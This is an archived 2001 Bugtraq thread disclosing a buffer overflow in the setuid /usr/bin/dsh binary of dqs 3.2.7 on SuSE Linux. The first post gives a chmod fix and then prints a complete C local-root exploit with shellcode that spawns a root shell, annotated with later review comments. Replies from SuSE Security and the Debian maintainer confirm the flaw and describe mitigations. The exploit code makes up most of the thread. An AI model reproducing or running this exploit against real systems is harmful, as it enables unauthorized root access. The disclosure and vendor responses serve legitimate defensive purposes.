6517688 2001-05-19 00:09 +0000  /183 rader/ dex dex <dexgod@softhome.net>
Sänt av: joel@lysator.liu.se
Importerad: 2001-05-19  04:52  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17096>
Ärende: dqs 3.2.7 local root exploit.
------------------------------------------------------------
From: dex dex <dexgod@softhome.net>
To: bugtraq@securityfocus.com
Message-ID: <20010519000911.4356.qmail@securityfocus.com>


Subject: dqs 3.2.7 local root exploit.

Hello.

DESCRIPTION:
I found a buffer overflow vulnerability in
/usr/bin/dsh (dqs 3.2.7
package).

I really don't know if this bug was discovered
already. if thats right,
then sorry =).

If a long string is given as the first argument, the
program dies with a SIGSEGV
signal.

This bug was reported to Drake Diedrich, maintainer
of dqs
(Drake.Diedrich@anu.edu.adu).

AFFECTED:
SuSE 6.3, 6.4 and 7.0 ship dqs 3.2.7 by default
and are therefore vulnerable;
others may be as well.

FIX:
Remove the SUID permission
|root@netdex /root|# ls -la /usr/bin/dsh
-rwsr-xr-x    1 root     root       502748 May 18
00:36 /usr/bin/dsh
|root@netdex /root|# chmod -s /usr/bin/dsh
|root@netdex /root|# ls -la /usr/bin/dsh
-rwxr-xr-x    1 root     root       502748 May 18
00:36 /usr/bin/dsh
|root@netdex /root|#

EXAMPLE EXPLOIT: 
You can find the exploit at
www.raza-mexicana.org/programas/programas/qsexp.c
And here it is:

----CUT HERE----

/* - dqsexp.c - */
/********************************************************************/
/* /usr/bin/dsh(dqs 3.2.7 package) local root
exploit.              */
/* SuSE 6.3, 6.4, and 7.0 are
vunerable.                            */
/* dex@raza-mexicana.org <>
http://www.raza-mexicana.org            */
/* Saludos: dr_fdisk^, yield, vlad, deadsector,
trovalz, fatal,     */
/* megaflop y a todo raza. que weba escribirlos
todos XD.           */
/* En especial saludos al espa~olete(NOP) :P, ya
sabes porque.      */
/*                                                                 
*/
/*        - dex@raza-mexicana.org <>
http://www.raza-mexicana.org - */
/********************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFSIZE 2772   /* default length of the argument buffer built in main(); argv[3] overrides */
#define OFFSET 0        /* default subtracted from get_sp() to form the guessed address; argv[1] overrides */
#define ALIGN 0         /* default extra shift applied when placing `code` inside the buffer; argv[2] overrides */

/*
 * Returns the current stack pointer.  The inline asm copies %esp into %eax,
 * the i386 integer return register, so the value reaches the caller only by
 * way of the calling convention.
 * NOTE(review): there is no `return` statement, so using the result is
 * undefined behaviour in standard C; an optimising compiler is free to
 * clobber %eax before the function returns.  i386-only by construction.
 */
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}

/*
 * Position-independent i386 machine code: two Linux `int $0x80` system calls
 * (the %al loads below select numbers 70 and 0x0b), followed by the bytes
 * that spell "/bin/sh".  The per-instruction comments are the original
 * author's disassembly and are kept as written.  The sequence contains no
 * 0x00 byte, which main() relies on when it sizes the copy with strlen(code).
 */
static char code[]=                      /* stolen from mount.c :P   */

  "\x29\xc0"                             /* subl %eax, %eax          */
  "\xb0\x46"                             /* movb $70, %al            */
  "\x29\xdb"                             /* subl %ebx, %ebx          */
  "\xb3\x0c"                             /* movb $12, %bl            */
  "\x80\xeb\x0c"                         /* subb $12, %bl            */
  "\x89\xd9"                             /* movl %ebx, %ecx          */
  "\xcd\x80"                             /* int $0x80                */
  "\xeb\x18"                             /* jmp callz                */
  "\x5e"                                 /* popl %esi                */
  "\x29\xc0"                             /* subl %eax, %eax          */
  "\x88\x46\x07"                         /* movb %al, 0x07(%esi)     */
  "\x89\x46\x0c"                         /* movl %eax, 0x0c(%esi)    */
  "\x89\x76\x08"                         /* movl %esi, 0x08(%esi)    */
  "\xb0\x0b"                             /* movb $0x0b, %al          */
  "\x87\xf3"                             /* xchgl %esi, %ebx         */
  "\x8d\x4b\x08"                         /* leal 0x08(%ebx), %ecx    */
  "\x8d\x53\x0c"                         /* leal 0x0c(%ebx), %edx    */
  "\xcd\x80"                             /* int $0x80                */
  "\xe8\xe3\xff\xff\xff"                 /* call start               */
  "\x2f\x62\x69\x6e\x2f\x73\x68";        /* "/bin/sh"                */


/*
 * Builds the oversized first argument the advisory describes and hands it to
 * /usr/bin/dsh through execl().  argv[1..3] optionally override OFFSET, ALIGN
 * and BUFFSIZE, in that order.  Nothing here is useful unless dsh is installed
 * setuid root; the advisory's mitigation is `chmod -s /usr/bin/dsh`, and the
 * vendor reply adds that on SuSE-7.1 /etc/permissions.* must be updated too so
 * the cleared bit is not restored.
 *
 * NOTE(review): `void main` is non-standard; C requires `int main`.
 * NOTE(review): several string literals below are split across lines by the
 * mail archive's re-wrapping, so the listing as printed does not compile.
 */
void main(int argc, char **argv) {

int i;
unsigned long addr;              /* guessed stack address, written twice at the end of the buffer */

char *buffer;                    /* heap block of buffsize + 8 bytes, handed to execl() as argv[1] */

int offset=OFFSET;
int buffsize=BUFFSIZE;
int align=ALIGN;

/* atoi() reports no errors: a non-numeric argument silently becomes 0 and
 * a negative buffsize is accepted, which makes every index below negative. */
if (argc > 1 ) offset = atoi(argv[1]);
if (argc > 2 ) align = atoi(argv[2]);
if (argc > 3 ) buffsize = atoi(argv[3]);

/* NOTE(review): the malloc() result is never checked for NULL. */
buffer = (char *)malloc(buffsize + 8);

addr = get_sp() - offset;
 
/* Fill the first buffsize bytes with 0x90 (i386 `nop`), one 4-byte word at
 * a time.  NOTE(review): storing through (long *) into a char buffer breaks
 * strict aliasing, may be misaligned, and assumes sizeof(long) == 4. */
for(i = 0; i < buffsize; i += 4) {
   *(long *)&buffer[i] = 0x90909090;
 }
 
 /* The last two words of the filled region carry the guessed address. */
 *(long *)&buffer[buffsize - 8] = addr;
 *(long *)&buffer[buffsize - 4] = addr;
 
 /* Copy `code` immediately before those two words, shifted back by `align`.
  * strlen(code) only works because the byte string holds no 0x00.
  * NOTE(review): no bounds check — a large align or a small buffsize puts
  * the destination before the start of the allocation. */
 memcpy(buffer + buffsize - 8 - strlen(code) -
align, code, strlen(code));
 

printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n");
 /* NOTE(review): the next two literals are broken across lines by wrapping. */
 printf("[*] /usr/bin/dsh(dqs 3.2.7 package) local
root exploit.\n");
 printf("[*] - dex@raza-mexicana.org <>
http://www.raza-mexicana.org -
\n");

printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
 
 /* NOTE(review): `%x` expects unsigned int but addr is unsigned long; `%lx`
  * is the matching conversion. */
 printf("[*] Address=0x%x, Align=%d, Offset=%d\n",
addr, align, offset);

printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
 printf("[*] Starting....\n");
 
 /* The buffer becomes argv[1] of dsh.  NOTE(review): nothing above writes a
  * terminating NUL, so where the C string ends depends on the uninitialised
  * tail of the malloc() block.  execl() only returns on failure and that
  * return value is not checked. */
 execl("/usr/bin/dsh", "dsh", buffer,
"/etc/motd",  NULL);
}

----EOF----

=================================================
Mail: dex@raza-mexicana.org
Page: http://www.raza-mexicana.org
===============================================
(6517688) /dex dex <dexgod@softhome.net>/-(Ombruten)
6519015 2001-05-19 05:26 +0200  /63 rader/ Roman Drahtmueller <draht@suse.de>
Sänt av: joel@lysator.liu.se
Importerad: 2001-05-19  20:46  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: draht@suse.de
Mottagare: Bugtraq (import) <17099>
Kommentar till text 6517688 av dex dex <dexgod@softhome.net>
Ärende: Re: dqs 3.2.7 local root exploit.
------------------------------------------------------------
From: Roman Drahtmueller <draht@suse.de>
To: <bugtraq@securityfocus.com>
Message-ID: <ENOCOKE.draht.silence.0101051905112599024188505005-100000@suse>

> DESCRIPTION:
> I found a buffer overflow vunerability on the
> /usr/bin/dsh (dqs 3.2.7
> package).
>
> I really don't know if this bug was discovered
> already. if thats right,
> then sorry =).

No, this is yet unknown to security@suse.de.

> If a long line on the first argument is gived, the
> program gives a SIGSEGV
> signal.
>
> This bug was reported to Drake Diedrich, Mantainer
> for dqs
> (Drake.Diedrich@anu.edu.adu).
>
> AFFECTED:
> SusE 6.3, 6.4, 7.0 have the dqs 3.2.7 by default
> an then it are vunerable,
> maybe others.

I confirm this vulnerability and that dqs has the setuid bit on the
file /usr/bin/dsh, but the package (as a package in the clustering
series) is not installed by default.

The fix (to remove the suid bit) is correct. If you have selected to
set the variable PERMISSION_SECURITY in /etc/rc.config to "secure
local" in SuSE-7.1 (recommended for security-enhanced settings), you
are not vulnerable. On SuSE-7.1, in addition to the chmod command
below, change the files /etc/permissions.*, too, to reflect the
removed suid bit.

If you do not need the dqs package, simply remove it using the command
  rpm -e dqs

Of course, we will provide update packages as soon as possible.

> FIX:
> Remove the SUID permission
> |root@netdex /root|# ls -la /usr/bin/dsh
> -rwsr-xr-x    1 root     root       502748 May 18
> 00:36 /usr/bin/dsh
> |root@netdex /root|# chmod -s /usr/bin/dsh
> |root@netdex /root|# ls -la /usr/bin/dsh
> -rwxr-xr-x    1 root     root       502748 May 18

Regards,
Roman Drahtmüller,
SuSE Security.
-- 
 -                                                                    -
| Roman Drahtmüller <draht@suse.de>     "Caution: Cape does not        |
  SuSE GmbH - Security                  enable user to fly."
| Nürnberg, Germany                     (Batman Costume warning label) |
 -                                                                    -
(6519015) /Roman Drahtmueller <draht@suse.de>/(Ombruten)
6519208 2001-05-19 14:09 +1000  /46 rader/ Drake Diedrich <Drake.Diedrich@anu.edu.au>
Sänt av: joel@lysator.liu.se
Importerad: 2001-05-19  21:59  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17102>
Kommentar till text 6517688 av dex dex <dexgod@softhome.net>
Ärende: Re: dqs 3.2.7 local root exploit.
------------------------------------------------------------
On Sat, May 19, 2001 at 12:09:11AM -0000, dex dex wrote:
> 
> DESCRIPTION:
> I found a buffer overflow vunerability on the
> /usr/bin/dsh (dqs 3.2.7
> package).
> 
 ...
> 
> This bug was reported to Drake Diedrich, Mantainer
> for dqs
> (Drake.Diedrich@anu.edu.adu).
> 

   I maintain only the Debian packaging of the DQS
suite. /usr/bin/dsh can be entirely removed from a DQS cluster with
no ill effects, and was removed from the Debian packages in early
1998 as part of a general cleanup of the package.  Debian 2.1 (slink)
and later are not vulnerable.
   The original publisher (SCRI, Florida State University) is no
longer maintaining DQS or employing the original author, but has also
refused to relax distribution restrictions, making it difficult to
found a new developer community.

dqs (3.1.8-2) unstable; urgency=low

  * Summarize and rotate monthly accounting logs
  * Replaced /bin/mail with /usr/bin/sendmail
  * Made /etc/dqs/conf_file into a configureation file.  Changed DQS_BIN.
  * Deleted dqs_options, dqs_random, and dsh
  * Moved qmaster and dqs_execd to /usr/lib/dqs, edit DQS_BIN in
    /etc/dqs/conf_file
  * Switched to debhelper from debstd
  * Added restart and force-reload to /etc/init.d/dqs
  * A million Lintian fixes.

 -- Drake Diedrich <Drake.Diedrich@anu.edu.au>  Mon, 16 Feb 1998
11:47:04
+1100



-- 
Dr. Drake Diedrich, Head - Information and Communications Unit
John Curtin School of Medical Research, GPO Box 334  Canberra ACT  2601
Voice: +61(2)6125-2528   FAX: +61(2)6125-4823
(6519208) /Drake Diedrich <Drake.Diedrich@anu.edu.au>/(Ombruten)
Bilaga (application/pgp-signature) i text 6519209
6519209 2001-05-19 14:09 +1000  /12 rader/ Drake Diedrich <Drake.Diedrich@anu.edu.au>
Importerad: 2001-05-19  21:59  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17103>
Bilaga (text/plain) till text 6519208
Ärende: Bilaga till: Re: dqs 3.2.7 local root exploit.
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iQCVAwUBOwXyA9D4/OIVS4ptAQFKjwP/dAbOH7uJ2akj7JhVHCo2qobgG5v7p1Ab
8MWbaf6MojCOUJlHYKpYnhHKwCyWl6UicL3cPCQOkE5fPyarIOOVp9guFn7OR+nh
YYVLOf3/sciJW4UKIVKYqtAppCcnnRdW9ckJAy+D4LZ1pySKcASMs1y4oUgndc3P
xtx6WSn9hy0=
=JRH2
-----END PGP SIGNATURE-----
(6519209) /Drake Diedrich <Drake.Diedrich@anu.edu.au>/